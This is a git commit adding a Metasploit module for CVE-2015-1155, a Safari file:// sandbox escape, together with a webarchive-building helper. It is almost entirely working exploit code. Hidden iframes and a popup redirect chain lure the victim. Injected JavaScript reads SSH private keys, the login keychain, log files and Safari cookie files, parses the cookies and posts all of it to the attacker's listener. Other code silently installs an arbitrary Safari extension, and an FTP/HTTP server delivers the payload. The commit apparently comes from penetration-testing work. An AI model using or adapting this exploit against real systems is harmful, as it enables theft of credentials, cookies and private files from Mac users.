Add safari module for CVE-2015-1155

bug/bundler_fix
Tod Beardsley 2015-06-23 16:15:50 -05:00
parent a2a231c242
commit 18a9585f7a
No known key found for this signature in database
GPG Key ID: BD63D0A3EA19CAAC
2 changed files with 718 additions and 0 deletions

View File

@ -0,0 +1,369 @@
#safari.installExtension("com.pinterest.extension-HWZFLG9PNK","http://assets.pinterest.com/ext/Pinterest-Safari.safariextz")
module Msf
module Format
module Webarchive
def initialize(info={})
super
register_options(
[
OptString.new('FILENAME', [ true, 'The file name', 'msf.webarchive']),
OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install"]),
OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install"])
],
self.class)
end
### ASSEMBLE THE WEBARCHIVE XML ###
# @return [String] contents of webarchive as an XML document
def webarchive_xml
return @xml if not @xml.nil? # only compute xml once
@xml = webarchive_header
@xml << webarchive_footer
@xml
end
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
def webarchive_header
%Q|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>WebMainResource</key>
<dict>
<key>WebResourceData</key>
<data>
#{Rex::Text.encode_base64(iframes_container_html)}</data>
<key>WebResourceFrameName</key>
<string></string>
<key>WebResourceMIMEType</key>
<string>text/html</string>
<key>WebResourceTextEncodingName</key>
<string>UTF-8</string>
<key>WebResourceURL</key>
<string>file:///</string>
</dict>
<key>WebSubframeArchives</key>
<array>
|
end
# @return [String] the closing chunk of the webarchive XML code
def webarchive_footer
%Q|
</array>
</dict>
</plist>
|
end
#### JS/HTML CODE ####
# Wraps the result of the block in an HTML5 document and body
def wrap_with_doc(&blk)
%Q|
<!doctype html>
<html>
<body>
#{yield}
</body>
</html>
|
end
# Wraps the result of the block with <script> tags
def wrap_with_script(&blk)
"<script>#{yield}</script>"
end
# @return [String] mark up for embedding the iframes for each URL in a place that is
# invisible to the user
def iframes_container_html
hidden_style = "position:fixed; left:-600px; top:-600px;"
wrap_with_doc do
frames = "<iframe src='#{apple_extension_url}' style='#{hidden_style}'></iframe>"
communication_js + frames + injected_js_helpers + steal_files + install_extension + message
end
end
# @return [String] javascript code, wrapped in script tags, that is inserted into the
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
def communication_js
wrap_with_script do
%Q|
window.addEventListener('message', function(event){
var x = new XMLHttpRequest;
x.open('POST', '#{backend_url}#{collect_data_uri}', true);
x.send(event.data);
});
|
end
end
def apple_extension_url
'https://extensions.apple.com'
end
def install_extension
wrap_with_script do
%Q|
var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
setTimeout(function(){
function go(){
window.focus();
window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
}
setInterval(go, 400);
}, 600);
|
end
end
# @return [String] javascript code, wrapped in a script tag, that steals local files
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
def steal_files
return '' unless should_steal_files?
urls_str = (datastore['FILE_URLS'].split(/\s+/)).reject { |s| !s.include?('$USER') }.join(' ')
wrap_with_script do
%Q|
var filesStr = "#{urls_str}";
var files = filesStr.trim().split(/\s+/);
function stealFile(url) {
var req = new XMLHttpRequest();
var sent = false;
req.open('GET', url, true);
req.onreadystatechange = function() {
if (!sent && req.responseText && req.responseText.length > 0) {
sendData(url, req.responseText);
sent = true;
}
};
req.send(null);
};
files.forEach(stealFile);
| + steal_default_files
end
end
def default_files
('file:///Users/$USER/.ssh/id_rsa file:///Users/$USER/.ssh/id_rsa.pub '+
'file:///Users/$USER/Library/Keychains/login.keychain ' +
(datastore['FILE_URLS'].split(/\s+/)).select { |s| s.include?('$USER') }.join(' ')).strip
end
def steal_default_files
%Q|
try {
function xhr(url, cb, responseType) {
var x = new XMLHttpRequest;
x.onload = function() { cb(x) }
x.open('GET', url);
if (responseType) x.responseType = responseType;
x.send();
}
var files = ['/var/log/monthly.out', '/var/log/appstore.log', '/var/log/install.log'];
var done = 0;
var _u = {};
var cookies = [];
files.forEach(function(f) {
xhr(f, function(x) {
var m;
var users = [];
var pattern = /\\/Users\\/([^\\s^\\/^"]+)/g;
while ((m = pattern.exec(x.responseText)) !== null) {
if(!_u[m[1]]) { users.push(m[1]); }
_u[m[1]] = 1;
}
if (users.length) { next(users); }
});
});
var id=0;
function next(users) {
// now lets steal all the data we can!
sendData('usernames'+id, users);
id++;
users.forEach(function(user) {
if (#{datastore['STEAL_COOKIES']}) {
xhr('file:///Users/'+encodeURIComponent(user)+'/Library/Cookies/Cookies.binarycookies', function(x) {
parseBinaryFile(x.response);
}, 'arraybuffer');
}
if (#{datastore['STEAL_FILES']}) {
var files = '#{Rex::Text.encode_base64(default_files)}';
atob(files).split(/\\s+/).forEach(function(file) {
file = file.replace('$USER', encodeURIComponent(user));
xhr(file, function(x) {
sendData(file.replace('file://', ''), x.responseText);
});
});
}
});
}
function parseBinaryFile(buffer) {
var data = new DataView(buffer);
// check for MAGIC 'cook' in big endian
if (data.getUint32(0, false) != 1668247403)
throw new Error('Invalid magic at top of cookie file.')
// big endian length in next 4 bytes
var numPages = data.getUint32(4, false);
var pageSizes = [], cursor = 8;
for (var i = 0; i < numPages; i++) {
pageSizes.push(data.getUint32(cursor, false));
cursor += 4;
}
pageSizes.forEach(function(size) {
parsePage(buffer.slice(cursor, cursor + size));
cursor += size;
});
reportStolenCookies();
}
function parsePage(buffer) {
var data = new DataView(buffer);
if (data.getUint32(0, false) != 256) {
return; // invalid magic in page header
}
var numCookies = data.getUint32(4, true);
var offsets = [];
for (var i = 0; i < numCookies; i++) {
offsets.push(data.getUint32(8+i*4, true));
}
offsets.forEach(function(offset, idx) {
var next = offsets[idx+1] \|\| buffer.byteLength - 4;
try{parseCookie(buffer.slice(offset, next));}catch(e){};
});
}
function read(data, offset) {
var str = '', c = null;
try {
while ((c = data.getUint8(offset++)) != 0) {
str += String.fromCharCode(c);
}
} catch(e) {};
return str;
}
function parseCookie(buffer) {
var data = new DataView(buffer);
var size = data.getUint32(0, true);
var flags = data.getUint32(8, true);
var urlOffset = data.getUint32(16, true);
var nameOffset = data.getUint32(20, true);
var pathOffset = data.getUint32(24, true);
var valueOffset = data.getUint32(28, true);
var result = {
value: read(data, valueOffset),
path: read(data, pathOffset),
url: read(data, urlOffset),
name: read(data, nameOffset),
isSecure: flags & 1,
httpOnly: flags & 4
};
cookies.push(result);
}
function reportStolenCookies() {
if (cookies.length > 0) {
sendData('cookieDump', cookies);
}
}
} catch (e) { console.log('ERROR: '+e.message); }
|
end
# @return [String] javascript code, wrapped in script tag, that adds a helper function
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
def injected_js_helpers
wrap_with_script do
%Q|
window.sendData = function(key, val) {
var data = {};
data[key] = val;
window.top.postMessage(JSON.stringify(data), "*")
};
|
end
end
### HELPERS ###
# @return [String] the path to send data back to
def collect_data_uri
'/' + datastore["URIPATH"].chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
end
# @return [String] formatted http/https URL of the listener
def backend_url
proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
"#{proto}://#{myhost}#{port_str}"
end
# @return [String] URL that serves the malicious webarchive
def webarchive_download_url
datastore["DOWNLOAD_PATH"]
end
# @return [String] HTML content that is rendered in the <body> of the webarchive.
def message
"<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
end
# @return [Array<String>] of URLs provided by the user
def urls
(datastore['URLS'] || '').split(/\s+/)
end
# @param [String] input the unencoded string
# @return [String] input with dangerous chars replaced with xml entities
def escape_xml(input)
input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
.gsub(">", "&gt;").gsub("'", "&apos;")
.gsub("\"", "&quot;")
end
def should_steal_files?
datastore['STEAL_FILES']
end
end
end
end

View File

@ -0,0 +1,349 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
require 'msf/core/format/webarchive'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Format::Webarchive
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Due to an issue in the way Safari handles error page origins,
an attacker who can entice a user into visiting a malicious page
can gain a reference to the resulting error page in the file:// scheme.
From there, the attacker can access cross-domain globals, such as 'location'
and 'history,' which leads to a total compromise of the sandbox.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-288'],
['CVE', '2015-1155']
],
'Platform' => 'osx',
'Targets' =>
[
[ 'Mac OS X', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2014'
))
register_options(
[
OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
], self.class )
end
def lookup_lhost(c=nil)
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address( c || '50.50.50.50')
else
datastore['SRVHOST']
end
end
def on_request_uri(cli, req)
if req.method =~ /post/i
begin
data_str = if req.body.size > 0
req.body
else
req.qstring['data']
end
data = JSON::parse(data_str || '')
file = record_data(data, cli)
send_response(cli, 200, 'OK', '')
print_good "data #{data.keys.join(',')} received and stored to #{file}"
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
print_error "Invalid JSON received."
send_not_found(cli)
end
elsif req.uri =~ /#{popup_path}$/
send_response(cli, 200, 'OK', popup_html)
else
send_response(cli, 200, 'OK', exploit_html)
end
end
def ftp_user
@ftp_user ||= Rex::Text.rand_text_alpha(6)
end
def ftp_pass
@ftp_pass ||= Rex::Text.rand_text_alpha(6)
end
def exploit_html
%Q|
<html><body>
<script>
window.onclick = function() {
window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');
}
</script>
The page has moved. <a href='#'>Click here</a> to be redirected.
</body></html>
|
end
def ftp_url
"ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}"
end
def popup_html
%Q|
<script>
function perform() {
if (arguments.length > 0) {
var nextArgs = Array.prototype.slice.call(arguments, 1);
arguments[0]();
setTimeout(function() {
perform.apply(null, nextArgs);
}, 300);
}
}
perform(
function() { opener.location = 'http://localhost:99999'; },
function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },
function() { opener.location = 'about:blank' },
function() { opener.history.back(); },
function() { window.location = '#{ftp_url}'; },
function() { opener.location = 'http://localhost:99998'; },
function() {
history.pushState.call(
opener.history, {}, {},
'file:///Volumes/#{lookup_lhost}/#{payload_name}'
);
},
function() { opener.location = 'about:blank'; },
function() { opener.history.back(); },
function() { },
function() { window.location = '#{apple_extension_url}'; }
)
</script>
|
end
#
# Handle FTP LIST request (send back the directory listing)
#
def on_client_command_list(c, arg)
conn = establish_data_connection(c)
if not conn
c.put("425 Can't build data connection\r\n")
return
end
print_status("Data connection setup")
c.put("150 Here comes the directory listing\r\n")
print_status("Sending directory list via data connection #{webarchive_size}")
month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
m = month_names[Time.now.month-1]
d = Time.now.day
y = Time.now.year
dir = "-rwxr-xr-x 1 ftp ftp #{webarchive_size} #{m} #{d} #{y} #{payload_name}\r\n"
print_status dir
conn.put(dir)
conn.close
print_status("Directory sent ok")
c.put("226 Transfer ok\r\n")
return
end
#
# Handle the FTP RETR request. This is where we transfer our actual malicious payload
#
def on_client_command_retr(c, arg)
conn = establish_data_connection(c)
if not conn
return c.put("425 can't build data connection\r\n")
end
print_status("Connection for file transfer accepted")
c.put("150 Connection accepted\r\n")
# Send out payload
conn.put(webarchive)
conn.close
end
def volume_name
@volume_name ||= Rex::Text.rand_text_alpha(12)
end
def payload_name
'msf.webarchive'
end
def popup_path
@popup_uri ||= Rex::Text.rand_text_alpha(12)
end
def webarchive
webarchive_xml
end
def webarchive_size
print_status "Webarchive_SiZE=#{webarchive_xml.length}"
webarchive_xml.length
end
def run
# Start the FTP server
print_status("Running FTP service...")
start_service
# Create our own HTTP server
# We will stay in this functino until we manually terminate execution
start_http
end
#
# Handle the HTTP request and return a response. Code borrorwed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
# Ensture all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
if (comm.to_s == "local")
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
# Default the server host / port
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@http_service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
opts['ServerPort'].to_i,
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
datastore['SSLCert']
)
@http_service.server_name = datastore['HTTP::server_name']
# Default the procedure of the URI to on_request_uri if one isn't
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
proto = (datastore["SSL"] ? "https" : "http")
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
if (opts['ServerHost'] == '0.0.0.0')
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end
# Add path to resource
@service_path = uopts['Path']
@http_service.add_resource(uopts['Path'], uopts)
# As long as we have the http_service object, we will keep the ftp server alive
while @http_service
select(nil, nil, nil, 1)
end
end
#
# Ensures that gzip can be used. If not, an exception is generated. The
# exception is only raised if the DisableGzip advanced option has not been
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end
#
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
path = '/' + path if path !~ /^\//
datastore['URIPATH'] = path
return path
end
#
# Create an HTTP response and then send it
#
def send_response(cli, code, message='OK', html='')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
res.body = html
cli.send_response(res)
end
# @param [Hash] data the data to store in the log
# @return [String] filename where we are storing the data
def record_data(data, cli)
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
store_loot(
file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
)
end
#
# Kill HTTP/FTP (shut them down and clear resources)
#
def cleanup
super
# Kill FTP
stop_service
# clear my resource, deregister ref, stop/close the HTTP socket
begin
@http_service.remove_resource(datastore['URIPATH'])
@http_service.deref
@http_service.stop
@http_service.close
@http_service = nil
rescue
end
end
end